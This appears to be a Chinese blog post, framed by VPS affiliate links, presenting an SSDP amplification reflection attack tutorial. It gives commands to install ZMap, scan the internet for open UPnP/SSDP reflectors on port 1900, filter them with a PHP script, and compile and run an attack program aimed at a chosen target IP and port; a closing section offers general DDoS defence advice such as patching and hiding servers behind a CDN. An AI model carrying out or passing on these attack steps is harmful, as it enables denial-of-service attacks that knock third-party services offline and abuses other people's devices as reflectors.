搬瓦工注册链接：精品稳定服务器购买

ZMap安装

由于系统很多，不同的系统有不同的安装方法，具体如下：

1、Debian 和 Ubuntu 安装命令：

sudo apt install zmap

2、Fedora、 CentOS 和 RHEL 安装命令：

sudo yum install zmap

3、macOS

brew install zmap

4、Arch Linux

sudo pacman -S zmap

SSDP放大反射攻击扫描教程,放大列表扫描教程!

我用的是centos 64位

先更新系统

yum -y update

区分centos6 centos7 执行不同的命令!

Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos 7 
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
     https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-12.noarch.rpm

安装必要的依赖环境!

yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap

上传这里的文件到你的机器!

开始扫描SSDP放大列表

screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt

等扫描完成后,我们开始执行过滤!

php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000

然后,编译我们的攻击脚本,

gcc -pthread ssdp.c -o ssdp
./ssdp <target IP> <target port> <reflection file>  <time (optional)>

五、总结

DDOS攻击很难通过某一种手段做到完全防御，很多中小型企业，没有能力也没有财力来对抗DDOS攻击。但通过下面的几点，还是可以做到简单的防御：

保证服务器系统的安全

首先要确保服务器软件没有任何漏洞，防止攻击者入侵。确保服务器采用最新系统，并打上安全补丁。在服务器上删除未使用的服务，关闭未使用的端口。对于服务器上运行的网站，确保其打了最新的补丁，没有安全漏洞。

隐藏服务器真实IP

服务器前端加CDN中转（免费的有百度云加速、360网站卫士、加速乐、安全宝等），如果资金充裕的话，可以购买高防的盾机，用于隐藏服务器真实IP，域名解析使用CDN的IP，所有解析的子域名都使用CDN的IP地址。此外，服务器上部署的其他域名也不能使用真实IP解析，全部都使用CDN来解析。

另外，防止服务器对外传送信息泄漏IP，最常见的是，服务器不使用发送邮件功能，如果非要发送邮件，可以通过第三方代理（例如sendcloud）发送，这样对外显示的IP是代理的IP。

总之，只要服务器的真实IP不泄露，10G以下小流量DDOS的预防花不了多少钱，免费的CDN就可以应付得了。如果攻击流量超过20G，那么免费的CDN可能就顶不住了，需要购买一个高防的盾机来应付了，而服务器的真实IP同样需要隐藏。



搬瓦工注册链接：精品稳定服务器购买

未经允许不得转载：阿虎爱分享----致力于分享各种免费资源 > SSDP放大反射攻击扫描教程,放大列表扫描教程!